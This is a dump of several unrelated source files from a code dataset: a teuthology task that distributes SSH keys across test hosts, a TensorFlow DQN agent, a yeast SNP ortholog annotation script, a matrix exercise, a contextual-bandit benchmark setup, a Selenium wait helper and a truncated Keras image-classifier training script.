cleanup_keys(ctx, public_key):\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n for host in ctx.cluster.remotes.iterkeys():\n username, hostname = str(host).split('@')\n log.info('cleaning up keys on {host}'.format(host=hostname, user=username))\n\n # try to extract a public key for the host from the ctx.config entries\n host_key_found = False\n for t, host_key in ctx.config['targets'].iteritems():\n\n if str(t) == str(host):\n keytype, key = host_key.split(' ',1)\n client.get_host_keys().add(\n hostname=hostname,\n keytype=keytype,\n key=create_key(keytype,key)\n )\n host_key_found = True\n log.info('ssh key found in ctx')\n\n # if we did not find a key, load the system keys\n if False == host_key_found:\n client.load_system_host_keys()\n log.info('no key found in ctx, using system host keys')\n\n client.connect(hostname, username=username)\n client.exec_command('rm ~/.ssh/id_rsa')\n client.exec_command('rm ~/.ssh/id_rsa.pub')\n\n # get the absolute path for authorized_keys\n stdin, stdout, stderr = client.exec_command('ls ~/.ssh/authorized_keys')\n auth_keys_file = stdout.readlines()[0].rstrip()\n\n mySftp = client.open_sftp()\n\n # write to a different authorized_keys file in case something\n # fails 1/2 way through (don't want to break ssh on the vm)\n old_auth_keys_file = mySftp.open(auth_keys_file)\n new_auth_keys_file = mySftp.open(auth_keys_file + '.new', 'w')\n out_keys = []\n\n for line in old_auth_keys_file.readlines():\n match = re.search(re.escape(public_key), line)\n\n if match:\n pass\n else:\n new_auth_keys_file.write(line)\n\n # close the files\n old_auth_keys_file.close()\n new_auth_keys_file.close()\n\n # now try to do an atomic-ish rename. If we botch this, it's bad news\n stdin, stdout, stderr = client.exec_command('mv ~/.ssh/authorized_keys.new ~/.ssh/authorized_keys')\n\n mySftp.close()\n client.close()\n\n@contextlib.contextmanager\ndef tweak_ssh_config(ctx, config): \n run.wait(\n ctx.cluster.run(\n args=[\n 'echo', \n 'StrictHostKeyChecking no\\n', \n run.Raw('>'), \n run.Raw('/home/ubuntu/.ssh/config'),\n ],\n wait=False,\n )\n )\n\n try: \n yield\n\n finally:\n run.wait(\n ctx.cluster.run(\n args=['rm',run.Raw('/home/ubuntu/.ssh/config')],\n wait=False\n ),\n )\n\n@contextlib.contextmanager\ndef push_keys_to_host(ctx, config, public_key, private_key): \n\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n for host in ctx.cluster.remotes.iterkeys():\n log.info('host: {host}'.format(host=host))\n username, hostname = str(host).split('@')\n \n # try to extract a public key for the host from the ctx.config entries\n host_key_found = False\n for t, host_key in ctx.config['targets'].iteritems():\n\n if str(t) == str(host):\n keytype, key = host_key.split(' ',1)\n client.get_host_keys().add(\n hostname=hostname,\n keytype=keytype,\n key=create_key(keytype,key)\n )\n host_key_found = True\n log.info('ssh key found in ctx')\n\n # if we did not find a key, load the system keys\n if False == host_key_found:\n client.load_system_host_keys()\n log.info('no key found in ctx, using system host keys')\n\n log.info('pushing keys to {host} for {user}'.format(host=hostname, user=username))\n\n client.connect(hostname, username=username)\n client.exec_command('echo \"{priv_key}\" > ~/.ssh/id_rsa'.format(priv_key=private_key))\n # the default file permissions cause ssh to balk\n client.exec_command('chmod 500 ~/.ssh/id_rsa')\n client.exec_command('echo \"ssh-rsa {pub_key} {user_host}\" > ~/.ssh/id_rsa.pub'.format(pub_key=public_key,user_host=host))\n \n # for this host, add all hosts to the ~/.ssh/authorized_keys file\n for inner_host in ctx.cluster.remotes.iterkeys():\n client.exec_command('echo \"ssh-rsa {pub_key} {user_host}\" >> ~/.ssh/authorized_keys'.format(pub_key=public_key,user_host=str(inner_host)))\n\n\n client.close()\n\n try: \n yield\n\n finally:\n # cleanup the keys\n log.info(\"Cleaning up SSH keys\")\n cleanup_keys(ctx, public_key)\n\n\n@contextlib.contextmanager\ndef task(ctx, config):\n \"\"\"\n Creates a set of RSA keys, distributes the same key pair\n to all hosts listed in ctx.cluster, and adds all hosts\n to all others authorized_keys list. \n\n During cleanup it will delete .ssh/id_rsa, .ssh/id_rsa.pub \n and remove the entries in .ssh/authorized_keys while leaving\n pre-existing entries in place. \n \"\"\"\n\n if config is None:\n config = {}\n assert isinstance(config, dict), \\\n \"task hadoop only supports a dictionary for configuration\"\n\n # this does not need to do cleanup and does not depend on \n # ctx, so I'm keeping it outside of the nested calls\n public_key_string, private_key_string = generate_keys()\n\n with contextutil.nested(\n lambda: push_keys_to_host(ctx, config, public_key_string, private_key_string),\n lambda: tweak_ssh_config(ctx, config), \n\n ):\n yield\n\n","sub_path":"teuthology/task/ssh_keys.py","file_name":"ssh_keys.py","file_ext":"py","file_size_in_byte":6344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"214652777","text":"# -----------------------------\r\n# File: Deep Q-Learning Algorithm\r\n# Author: Flood Sung\r\n# Date: 2016.3.21\r\n# -----------------------------\r\nimport random\r\nimport tensorflow as tf\r\nimport numpy as np\r\nimport environment\r\nimport itertools\r\nfrom gamestate import GameState\r\n\r\nfrom shared import *\r\n\r\nfrom collections import deque \r\n\r\n# Hyper Parameters:\r\nFRAME_PER_ACTION = 1\r\nGAMMA = 0.95 # decay rate of past observations\r\nOBSERVE = 50000. # timesteps to observe before training\r\n#OBSERVE = 100. # timesteps to observe before training\r\nEXPLORE = 1000000. # frames over which to anneal epsilon\r\nFINAL_EPSILON = 0.1#0.001 # final value of epsilon\r\nINITIAL_EPSILON = 1.0#0.01 # starting value of epsilon\r\nREPLAY_MEMORY = 1000000 # number of previous transitions to remember\r\nBATCH_SIZE = 32 # size of minibatch\r\nUPDATE_TIME = 10000\r\nHIDDEN_LAYER_NODES = 256\r\n\r\n\r\nclass BrainDQN:\r\n\r\n def __init__(self,input_vector_length, actions, history=8):\r\n # init replay memory\r\n self.replayMemory = deque()\r\n # init some parameters\r\n self.timeStep = 0\r\n self.epsilon = INITIAL_EPSILON\r\n self.actions = actions\r\n self.history = history\r\n # init Q network\r\n self.stateInput,self.QValue,self.W_fc1,self.b_fc1,self.W_fc2,self.b_fc2 = self.createQNetwork(input_vector_length)\r\n\r\n # init Target Q Network\r\n self.stateInputT,self.QValueT,self.W_fc1T,self.b_fc1T,self.W_fc2T,self.b_fc2T = self.createQNetwork(input_vector_length)\r\n\r\n self.copyTargetQNetworkOperation = [self.W_fc1T.assign(self.W_fc1),self.b_fc1T.assign(self.b_fc1),self.W_fc2T.assign(self.W_fc2),self.b_fc2T.assign(self.b_fc2)]\r\n\r\n self.createTrainingMethod()\r\n\r\n # saving and loading networks\r\n self.saver = tf.train.Saver()\r\n self.session = tf.InteractiveSession()\r\n self.session.run(tf.initialize_all_variables())\r\n checkpoint = tf.train.get_checkpoint_state(\"saved_networks\")\r\n if checkpoint and checkpoint.model_checkpoint_path:\r\n self.saver.restore(self.session, checkpoint.model_checkpoint_path)\r\n print(\"Successfully loaded:\", checkpoint.model_checkpoint_path)\r\n else:\r\n print(\"Could not find old network weights\")\r\n\r\n\r\n def createQNetwork(self, input_vector_length):\r\n # we don't need the convolutional layer, we go straight to MLP\r\n \r\n # network weights\r\n W_fc1 = self.weight_variable([input_vector_length*self.history,HIDDEN_LAYER_NODES])\r\n b_fc1 = self.bias_variable([HIDDEN_LAYER_NODES])\r\n\r\n W_fc2 = self.weight_variable([HIDDEN_LAYER_NODES,self.actions])\r\n b_fc2 = self.bias_variable([self.actions])\r\n\r\n # input layer\r\n X = tf.placeholder(\"float\", [None, input_vector_length*self.history])\r\n h_fc1 = tf.nn.relu(tf.matmul(X,W_fc1) + b_fc1)\r\n\r\n # Q Value layer\r\n QValue = tf.matmul(h_fc1,W_fc2) + b_fc2\r\n\r\n return X,QValue,W_fc1,b_fc1,W_fc2,b_fc2\r\n\r\n def copyTargetQNetwork(self):\r\n self.session.run(self.copyTargetQNetworkOperation)\r\n\r\n def createTrainingMethod(self):\r\n self.actionInput = tf.placeholder(\"float\",[None,self.actions])\r\n self.yInput = tf.placeholder(\"float\", [None]) \r\n Q_Action = tf.reduce_sum(tf.multiply(self.QValue, self.actionInput), reduction_indices = 1)\r\n self.cost = tf.reduce_mean(tf.square(self.yInput - Q_Action))\r\n self.trainStep = tf.train.RMSPropOptimizer(0.00025,0.99,0.0,1e-6).minimize(self.cost)\r\n\r\n\r\n def trainQNetwork(self):\r\n\r\n # Step 1: obtain random minibatch from replay memory\r\n minibatch = random.sample(self.replayMemory,BATCH_SIZE)\r\n state_batch = [data[0] for data in minibatch]\r\n action_batch = [data[1] for data in minibatch]\r\n reward_batch = [data[2] for data in minibatch]\r\n nextState_batch = [data[3] for data in minibatch]\r\n\r\n # Step 2: calculate y \r\n y_batch = []\r\n QValue_batch = self.QValueT.eval(feed_dict={self.stateInputT:nextState_batch})\r\n for i in range(0,BATCH_SIZE):\r\n terminal = minibatch[i][4]\r\n if terminal:\r\n y_batch.append(reward_batch[i])\r\n else:\r\n y_batch.append(reward_batch[i] + GAMMA * np.max(QValue_batch[i]))\r\n\r\n self.trainStep.run(feed_dict={\r\n self.yInput : y_batch,\r\n self.actionInput : action_batch,\r\n self.stateInput : state_batch\r\n })\r\n\r\n # save network every 100000 iteration\r\n if self.timeStep % 10000 == 0:\r\n self.saver.save(self.session, 'saved_networks/' + 'network' + '-dqn', global_step = self.timeStep)\r\n\r\n if self.timeStep % UPDATE_TIME == 0:\r\n self.copyTargetQNetwork()\r\n\r\n \r\n def setPerception(self,nextObservation,action,reward,terminal):\r\n # replaces the last item in the list with the new observation\r\n newState = self.currentState[len(nextObservation):] + nextObservation\r\n self.replayMemory.append((self.currentState,action,reward,newState,terminal))\r\n if len(self.replayMemory) > REPLAY_MEMORY:\r\n self.replayMemory.popleft()\r\n if self.timeStep > OBSERVE:\r\n # Train the network\r\n self.trainQNetwork()\r\n\r\n # print info\r\n state = \"\"\r\n if self.timeStep <= OBSERVE:\r\n state = \"observe\"\r\n elif self.timeStep > OBSERVE and self.timeStep <= OBSERVE + EXPLORE:\r\n state = \"explore\"\r\n else:\r\n state = \"train\"\r\n\r\n print(\"TIMESTEP\", self.timeStep, \"/ STATE\", state, \"/ EPSILON\", self.epsilon)\r\n\r\n self.currentState = newState\r\n self.timeStep += 1\r\n\r\n def getAction(self):\r\n QValue = self.QValue.eval(feed_dict= {self.stateInput:[self.currentState]})[0]\r\n action = np.zeros(self.actions)\r\n action_index = 0\r\n if self.timeStep % FRAME_PER_ACTION == 0:\r\n if random.random() <= self.epsilon:\r\n action_index = random.randrange(self.actions)\r\n action[action_index] = 1\r\n else:\r\n action_index = np.argmax(QValue)\r\n action[action_index] = 1\r\n else:\r\n action[0] = 1 # do nothing\r\n\r\n # change episilon\r\n if self.epsilon > FINAL_EPSILON and self.timeStep > OBSERVE:\r\n self.epsilon -= (INITIAL_EPSILON - FINAL_EPSILON)/EXPLORE\r\n\r\n return action\r\n\r\n def setInitState(self,observation):\r\n self.currentState = []\r\n for i in range(self.history):\r\n self.currentState.extend(observation)\r\n\r\n def weight_variable(self,shape):\r\n initial = tf.truncated_normal(shape, stddev = 0.01)\r\n return tf.Variable(initial)\r\n\r\n def bias_variable(self,shape):\r\n initial = tf.constant(0.01, shape = shape)\r\n return tf.Variable(initial)\r\n \r\n# Used for evaluating the network, not exploring and training\r\nclass PlayDQN(BrainDQN):\r\n \r\n def __init__(self,input_vector_length, actions, history=8):\r\n BrainDQN.__init__(self, input_vector_length, actions, history)\r\n \r\n def setPerception(self,nextObservation,action,reward,terminal):\r\n # replaces the last item in the list with the new observation\r\n self.currentState = self.currentState[len(nextObservation):] + nextObservation\r\n self.timeStep += 1\r\n \r\n def getAction(self):\r\n QValue = self.QValue.eval(feed_dict= {self.stateInput:[self.currentState]})[0]\r\n action = np.zeros(self.actions)\r\n action[np.argmax(QValue)] = 1\r\n return action","sub_path":"dqn.py","file_name":"dqn.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"528235832","text":"import sys, csv, re\n\nScas_Mut_Gene_in = sys.argv[1]\nScas_Gene_List_in = sys.argv[2]\nScer_Gene_List_in = sys.argv[3]\nHomology_List_in = sys.argv[4]\nScas_Scer_Gene_Annotation_out = sys.argv[5]\nScas_Scer_No_Ortholog_out = sys.argv[6]\nSNPS_Table_out = sys.argv[7]\n\nScas_Mut_Gene_in_open = csv.reader(open(Scas_Mut_Gene_in,'U'),delimiter=\"\\t\")\nScas_Gene_List_in_open = csv.reader(open(Scas_Gene_List_in,'U'),delimiter=\"\\t\")\nScer_Gene_List_in_open = csv.reader(open(Scer_Gene_List_in,'U'),delimiter=\"\\t\")\nHomology_List_in_open = csv.reader(open(Homology_List_in,'U'),delimiter=\"\\t\")\nScas_Scer_Gene_Annotation_out_open = open(Scas_Scer_Gene_Annotation_out,'w')\nScas_Scer_No_Ortholog_out_open = open(Scas_Scer_No_Ortholog_out,'w')\nSNPS_Table_out_open = open(SNPS_Table_out,'a')\n\nScas_Mut_Gene_List = [] #If you do not do this, it only iterates through the list once. Property of csv reader.\nfor line in Scas_Mut_Gene_in_open:\n Scas_Mut_Gene_List.append(line)\n\nScas_Gene_List = [] #If you do not do this, it only iterates through the list once. Property of csv reader.\nfor line in Scas_Gene_List_in_open:\n Scas_Gene_List.append(line)\n\nScer_Gene_List = [] #If you do not do this, it only iterates through the list once. Property of csv reader.\nfor line in Scer_Gene_List_in_open:\n Scer_Gene_List.append(line)\n\nHomology_List = []\nfor line in Homology_List_in_open:\n Homology_List.append(line)\n\nScas_Mut_Ortholog_List = [] \nScas_Mut_No_Ortholog_List = []\n\nSNPS_Considered = 0\n\nfor line in Scas_Mut_Gene_List:\n for row in Scas_Gene_List:\n if line[0] == row[0]:\n Scas_Mut_Ortholog_List.append(row[0])\n Scas_Mut_No_Ortholog_List.append(row[0])\n SNPS_Considered+=1\n\nSNPS_Table_out_open.write(\"Nonsynonymous Ortholog Search-\"+'\\n') \nSNPS_Table_out_open.write(\"SNPs Considered:\"+\" \"+str(SNPS_Considered)+'\\n') \n\nScas_Mut_Ortholog_Set = set(Scas_Mut_Ortholog_List)\nScas_Mut_No_Ortholog_Set = set(Scas_Mut_No_Ortholog_List)\n\nScer_Orthologs = len(Scas_Mut_Ortholog_Set)\n\nSNPS_Table_out_open.write(\"Genes Considered:\"+\" \"+str(Scer_Orthologs)+'\\n')\n\nScas_Mut_Ortholog_List_2 = list(Scas_Mut_Ortholog_Set)\nScas_Mut_No_Ortholog_List_2 = list(Scas_Mut_No_Ortholog_Set)\n\nScas_Mut_Extended_Ortholog_List = []\n\nfor line in Scas_Mut_Ortholog_List_2:\n for row in Scas_Gene_List:\n if line == row[0]:\n Scas_Mut_Extended_Ortholog_List.append(row)\n\nScas_Ortholog_List = []\nTemp_Scas_Ortholog_List = []\nMatch = 0\n\nfor line in Scas_Mut_Extended_Ortholog_List:\n for i in Scer_Gene_List:\n if re.search(i[0], line[8]):\n Match+=1\n Scer_Orthologs-=1\n Scas_Ortholog_List.append(line[0]+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+i[8]) \n Temp_Scas_Ortholog_List.append(line[0])\n\nfor line in Temp_Scas_Ortholog_List:\n for row in Scas_Mut_No_Ortholog_List_2:\n if row == line:\n Scas_Mut_No_Ortholog_List_2.remove(row)\n\nfor line in Scas_Mut_No_Ortholog_List_2:\n for row in Homology_List:\n if re.search(line, row[4]) and re.search(\"---\", row[11]) and re.search(\"---\", row[21]) or re.search(line, row[28]) and re.search(\"---\", row[11]) and re.search(\"---\", row[21]):\n if line == \"NCAS0J02110\":\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+\"---\"+\"\\t\"+\"AGO1\"+\"\\t\"+\"Argonaute Protein\")\n Temp_Scas_Ortholog_List.append(line)\n elif line == \"NCAS0C00230\":\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+\"---\"+\"\\t\"+\"DCR1\"+\"\\t\"+\"Dicer Protein\")\n Temp_Scas_Ortholog_List.append(line)\n else:\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+\"---\"+\"\\t\"+\"---\"+\"\\t\"+\"Likely part of transposable element\")\n Temp_Scas_Ortholog_List.append(line)\n elif re.search(line, row[4]):\n for i in Scer_Gene_List:\n if re.search(row[11], i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+i[8])\n Temp_Scas_Ortholog_List.append(line)\n elif re.search(row[21], i[0]) and not re.search(row[11], i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+\"Paralog to\"+\" \"+i[8])\n Temp_Scas_Ortholog_List.append(line) \n elif re.search(line, row[28]):\n for i in Scer_Gene_List:\n if re.search(row[21], i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+i[8])\n Temp_Scas_Ortholog_List.append(line)\n elif re.search(row[11], i[0]) and not re.search(row[21], i[0]):\n Match+=1\n Scas_Ortholog_List.append(line+\"\\t\"+i[0]+\"\\t\"+i[6]+\"\\t\"+\"Paralog to\"+\" \"+i[8])\n Temp_Scas_Ortholog_List.append(line)\n\nSNPS_Table_out_open.write(\"Genes with S. cerevisiae orthologs (Includes paralogs):\"+\" \"+str(Match)+'\\n')\n\nfor line in Temp_Scas_Ortholog_List:\n for row in Scas_Mut_No_Ortholog_List_2:\n if row == line:\n Scas_Mut_No_Ortholog_List_2.remove(row)\n\nSNPS_Table_out_open.write(\"Genes without S. cerevisiae orthologs:\"+\" \"+str(len(Scas_Mut_No_Ortholog_List_2))+'\\n')\nSNPS_Table_out_open.write('\\n'+'\\n')\n\nfor line in Scas_Ortholog_List:\n Scas_Scer_Gene_Annotation_out_open.write(line+\"\\n\")\n\nfor line in Scas_Mut_No_Ortholog_List_2:\n Scas_Scer_No_Ortholog_out_open.write(line+\"\\n\")\n\n \nScas_Scer_Gene_Annotation_out_open.close()\nScas_Scer_No_Ortholog_out_open.close()\nSNPS_Table_out_open.close()\n","sub_path":"SNP_Ncas_Scer_Gene_Comparison_Synteny_Nonsynonymous_Search.py","file_name":"SNP_Ncas_Scer_Gene_Comparison_Synteny_Nonsynonymous_Search.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"208125471","text":"def maxCons(mtx,n,m):\n c = []\n ind = 0\n consonant = 'bcdfghjklmnpqrstvwxz' + 'bcdfghjklmnpqrstvwxz'.upper()\n for j in range(m):\n count = 0\n for i in range(n-1):\n if (a[i][j] and a[i+1][j]) in consonant:\n count += 1\n c.append(count)\n if max(c) == count:\n ind = j\n return ind\n\ndef delCol(mtx,n,m):\n ind = maxCons(mtx,n,m)\n for i in range(n):\n del mtx[i][ind]\n\n for i in range(n):\n for j in range(m-1):\n print(mtx[i][j],end=' ')\n print()\n\nfrom random import randint\na = []\nN = 5\nM = 10\nsymbols = [chr(i) for i in range(91,97)]\nfor i in range(N):\n b = []\n for j in range(M):\n #b.append(input())\n b.append(chr(randint(65,122)))\n for k in range(len(b)):\n if b[k] in symbols:\n b[k] = chr(randint(97,122))\n print(b[j],end=' ')\n print('|',i+1,end='')\n a.append(b)\n print()\n\nfor i in range(M):\n print('-',end=' ')\nprint()\n\nfor i in range(M):\n print(i+1,end=' ')\n\nprint(\"\"\"\n\n\"\"\"\n'The index of column is:',maxCons(a,N,M)+1,\"\"\"\n\"\"\")\n\ndelCol(a,N,M)\n","sub_path":"allProgramms/helpforpyt/ekzamenTrue.py","file_name":"ekzamenTrue.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"461104153","text":"import os\n\n#this is taken from https://github.com/xianyi/OpenBLAS\nos.environ['OPENBLAS_NUM_THREADS'] = '1'\nos.environ['GOTO_NUM_THREADS'] = '1'\nos.environ['OMP_NUM_THREADS'] = '1'\n\nfrom simulations import MemorizableSimulation\nfrom learners import ResidualLearner, MemorizedLearner, MemCorralLearner, MemorizedVW, CMT_Implemented\nfrom scorers import ClassScorer, ClassScorer2, AdditionScorer, DistanceScorer, RegrScorer, UCBScorer, Baser\nfrom feedbacks import DevFeedback, RwdFeedback\nfrom examplers import PureExampler, DiffExampler\n\nfrom coba.simulations import ValidationSimulation, OpenmlSimulation\nfrom coba.benchmarks import Benchmark\nfrom coba.learners import VowpalLearner, CorralLearner\n\nmax_memories = 3000\nepsilon = 0.1\nd = 4\nc = 40\nmegalr = 0.1\n\nprocesses = 1\nshuffle = [1]\ntake = 10000\n\nsimulations = [\n #ValidationSimulation (30000, n_actions=5, action_features=False, make_binary=True),\n #ValidationSimulation (30000, n_actions=5, action_features=True , make_binary=True),\n #MemorizableSimulation(30000, n_anchors=200, n_actions=2, n_features=5)\n OpenmlSimulation(40985, nominal_as_str=True)\n]\n\n#BEST\nscorer1 = RegrScorer (exampler=PureExampler())\nscorer2 = ClassScorer (exampler=PureExampler())\nscorer3 = RegrScorer (exampler=DiffExampler())\nscorer4 = ClassScorer (exampler=DiffExampler())\nscorer5 = ClassScorer2()\n\n#SECOND BEST\n#scorer1 = RegrScorer (base=\"l2\" , exampler=PureExampler(), interactions=[\"ac\",\"ad\",\"bc\",\"bd\",\"abcd\"], ignored=[\"a\",\"b\",\"c\",\"d\"])\n#scorer2 = ClassScorer(base=\"l2\" , exampler=PureExampler(), interactions=[\"ac\",\"ad\",\"bc\",\"bd\",\"abcd\"], ignored=[\"a\",\"b\",\"c\",\"d\"])\n#scorer3 = RegrScorer (base=\"cos\", exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer4 = ClassScorer(base=\"l2\" , exampler=DiffSquareExampler(), interactions=[], ignored=[])\n\n#[x1,x2,x3] [y1,y2,y3]\n#[(x1-y1)**2, (x2-y2)**2, (x3-y3)**2] = ||x-y||^2\n\n#TEST BED\n#scorer1 = RegrScorer(base=\"none\",exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer2 = RegrScorer(base=\"mem\" ,exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer3 = RegrScorer(base=\"l2\" ,exampler=DiffSquareExampler(), interactions=[], ignored=[])\n#scorer4 = ClassScorer(base=\"cos\" ,exampler=DiffSquareExampler(), interactions=[], ignored=[])\n\n#950-1000 @2000\n#750 @2000\n\ncmt_1 = CMT_Implemented(max_memories, router_type='sk', alpha=0.25, scorer=scorer4, feedback=RwdFeedback(), c=c, d=d, megalr=megalr)\ncmt_2 = CMT_Implemented(max_memories, router_type='sk', alpha=0.25, scorer=scorer5, feedback=RwdFeedback(), c=c, d=d, megalr=megalr)\ncmt_3 = CMT_Implemented(max_memories, router_type='vw', alpha=0.25, scorer=scorer4, feedback=RwdFeedback(), c=c, d=d, megalr=megalr)\n#cmt_3 = CMT_Implemented(max_memories, router_type='vw', scorer=scorer3, signal=RwdFeedback(), c=c, d=d, megalr=megalr)\n#cmt_4 = CMT_Implemented(max_memories, router_type='vw', scorer=scorer4, signal=RwdFeedback(), c=c, d=d, megalr=megalr)\n\nlearners = [\n MemorizedLearner(epsilon, cmt_1),\n #MemorizedLearner(epsilon, cmt_2),\n #MemorizedLearner(epsilon, cmt_3),\n #MemorizedLearner(epsilon, cmt_3),\n #MemorizedLearner(epsilon, cmt_4),\n]\n\nif __name__ == '__main__':\n Benchmark(simulations, take=take, shuffle=shuffle).processes(processes).chunk_by('task').evaluate(learners).plot_learners()","sub_path":"study1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"516241693","text":"from lib.support.custom_wait import CustomWait\nfrom lib.support.expected import *\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.common.exceptions import MoveTargetOutOfBoundsException\n\n\nclass WebAction(CustomWait):\n\n def __init__(self, driver, model, timeout=30):\n super().__init__(timeout)\n self._driver = driver\n self._model = model\n\n def wait_until_text_display(self, text):\n return self.until(TextDisplayOnPage(text), f\"cannot see --{text}-- on page\")\n\n def wait_until_element_display(self, element, keyword=None):\n message = f\"cannot see --{element}-- on page\"\n if keyword:\n message += f\" with keyword --{keyword}--\"\n return self.until(ElementDisplayOnPage(self._model, element, keyword), message)\n\n def wait_until_element_match(self, element, keyword):\n message = f\"cannot see --{element}-- on page with keyword --{keyword}--\"\n return self.until(ElementMatchOnPage(self._model, element, keyword), message)\n\n def check_offset(self):\n v_size = BaseExpectation.get_viewport_size(self._driver)\n b_size = BaseExpectation.get_body_size(self._driver)\n body = self._driver.find_element_by_tag_name(\"body\")\n x = 0\n y = 0\n if v_size[1] != b_size[1]:\n while True:\n try:\n ActionChains(self._driver).move_to_element_with_offset(body, x, y).click().perform()\n ActionChains(self._driver).reset_actions()\n break\n except MoveTargetOutOfBoundsException:\n y += 10\n return [x, y], body\n","sub_path":"lib/action/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"558538505","text":"import os\r\nimport sys\r\nimport time\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\r\nfrom argparse import ArgumentParser\r\nfrom keras.callbacks import TensorBoard\r\nfrom keras import backend as K\r\nfrom keras.models import load_model\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\n\r\nfrom model import *\r\nfrom h5_to_pb import *\r\n\r\n# control CUDA/tensorflow log level\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' # or any {'0', '1', '2'}\r\n\r\n\r\ndef build_argparser():\r\n parser = ArgumentParser()\r\n parser.add_argument('-m', help='model name:lenet,squeezenet,mobilenet,resnet50',\r\n required=True, type=str, choices=['lenet', 'squeezenet', 'mobilenet', 'resnet50', 'xception'])\r\n parser.add_argument('-b', help='batch size', type=int, default=16)\r\n parser.add_argument('-e', help='epoch', type=int, default=30)\r\n parser.add_argument('-log', help='directory to save log', type=str,\r\n default='./log_dir')\r\n parser.add_argument('-dst', help='Path to the models to save.', required=True, type=str)\r\n parser.add_argument('-src', help='Path to the folder of the training data', required=True,\r\n type=str)\r\n parser.add_argument('-pm', help='Pre train model',default=\"\")\r\n parser.add_argument('-flip', help='Augmentation:is to flip image on x or y axis', action=\"store_true\")\r\n return parser\r\n\r\ndef main():\r\n # Parameter analysis\r\n args = build_argparser().parse_args()\r\n src_path = os.path.abspath(args.src)\r\n dst_path = os.path.abspath(args.dst)\r\n log_dir = args.log\r\n model_name = args.m\r\n batch_size = args.b\r\n epochs = args.e\r\n flip_flag = args.flip\r\n pre_train_model=args.pm\r\n\r\n\r\n pre_train_model=None if pre_train_model==\"\" else pre_train_model\r\n\r\n # prepare data\r\n num_classes = len(os.listdir(src_path))\r\n\r\n # keras config\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\r\n # keras_config = tf.ConfigProto()\r\n # keras_config.gpu_options.per_process_gpu_memory_fraction = 0.95\r\n # with tf.Session(config=keras_config) as sess:\r\n with tf.Session() as sess:\r\n K.set_session(sess)\r\n # prepare model\r\n if model_name == 'lenet':\r\n image_size = 32\r\n model = lenet(pretrained_weights=None,\r\n input_size=(image_size, image_size, 3),\r\n num_classes=num_classes)\r\n elif model_name == 'squeezenet':\r\n image_size = 227\r\n model = SqueezeNet(weights='imagenet',\r\n input_shape=(image_size, image_size, 3),\r\n classes=num_classes)\r\n elif model_name == 'mobilenet':\r\n image_size = 128\r\n model = mobilenet(input_size=(image_size, image_size, 3),\r\n num_classes=num_classes)\r\n elif model_name == 'resnet50':\r\n image_size = 224\r\n model = resnet50(input_size=(image_size, image_size, 3),\r\n num_classes=num_classes)\r\n elif model_name == 'xception':\r\n image_size = 299\r\n model = xception(input_size=(image_size, image_size, 3),\r\n num_classes=num_classes,pretrained_weights=pre_train_model)\r\n\r\n data_number = 0\r\n validation_split = 0.2\r\n for folder_name in os.listdir(src_path):\r\n data_number += len(os.listdir(os.path.join(src_path, folder_name)))\r\n print('all data number:', data_number)\r\n\r\n train_steps = int(data_number * (1 - validation_split) // batch_size)\r\n validation_step = int(data_number * validation_split // batch_size)\r\n\r\n # generate training data\r\n if flip_flag:\r\n datagen = ImageDataGenerator(horizontal_flip=True,\r\n vertical_flip=True,\r\n rescale=1. / 255,\r\n brightness_range=(0, 1.0),\r\n shear_range=10,\r\n channel_shift_range=50,\r\n validation_split=validation_split)\r\n else:\r\n datagen = ImageDataGenerator(rescale=1. / 255,\r\n brightness_range=(0, 1.0),\r\n shear_range=10,\r\n channel_shift_range=50,\r\n validation_split=validation_split)\r\n\r\n train_generator = datagen.flow_from_directory(src_path,\r\n subset='training',\r\n target_size=(image_size, image_size),\r\n batch_size=batch_size)\r\n # save_to_dir='/home/xuxin/Desktop/test/image')\r\n validation_generator = datagen.flow_from_directory(src_path,\r\n subset='validation',\r\n target_size=(image_size, image_size),\r\n batch_size=batch_size)\r\n\r\n model_path = os.path.join(dst_path, src_path.split(os.sep)[-1])\r\n os.makedirs(model_path, exist_ok=True)\r\n h5_path = os.path.join(model_path, model_name + '.h5')\r\n\r\n # training\r\n callbacks_list = [EarlyStopping(monitor='val_acc', patience=15, verbose=0),\r\n # TensorBoard(log_dir=log_dir),\r\n ModelCheckpoint(h5_path, monitor='val_acc', verbose=0,\r\n save_best_only=True, save_weights_only=False)]\r\n\r\n model.fit_generator(train_generator,\r\n steps_per_epoch=train_steps,\r\n epochs=epochs,\r\n validation_data=validation_generator,\r\n 